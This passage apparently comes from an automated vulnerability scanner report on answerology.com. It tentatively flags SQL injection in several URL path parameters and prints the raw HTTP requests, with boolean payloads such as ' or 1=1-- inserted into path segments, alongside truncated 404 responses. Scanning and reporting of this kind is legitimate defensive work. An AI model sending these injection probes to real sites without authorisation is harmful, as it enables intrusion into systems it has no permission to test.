Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.28. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/quickandsimple/QuickAndSimpleLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10784842'%20or%201%3d1--%20 and 10784842'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/quickandsimple10784842'%20or%201%3d1--%20/QuickAndSimpleLayout.js?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:43:16 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands/quickandsimple10784842'%20or%201%3d2--%20/QuickAndSimpleLayout.js?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:43:17 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.29. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/redbookmag/RedbookmagLayout.js

Issue detail

Request 1

GET /cobrands/redbookmag'%20and%201%3d1--%20/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:48 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/redbookmag'%20and%201%3d2--%20/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.30. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/redbookmag/RedbookmagLayout.js

Issue detail

Request 1

GET /cobrands/redbookmag/RedbookmagLayout.js'%20and%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/redbookmag/RedbookmagLayout.js'%20and%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.31. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/seventeen/SeventeenLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21121690'%20or%201%3d1--%20 and 21121690'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands21121690'%20or%201%3d1--%20/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands21121690'%20or%201%3d2--%20/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

1.32. http://www.answerology.com/cssjs/CharacterCounter.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cssjs/CharacterCounter.js

Issue detail

Request 1

GET /cssjs'%20and%201%3d1--%20/CharacterCounter.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:32 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

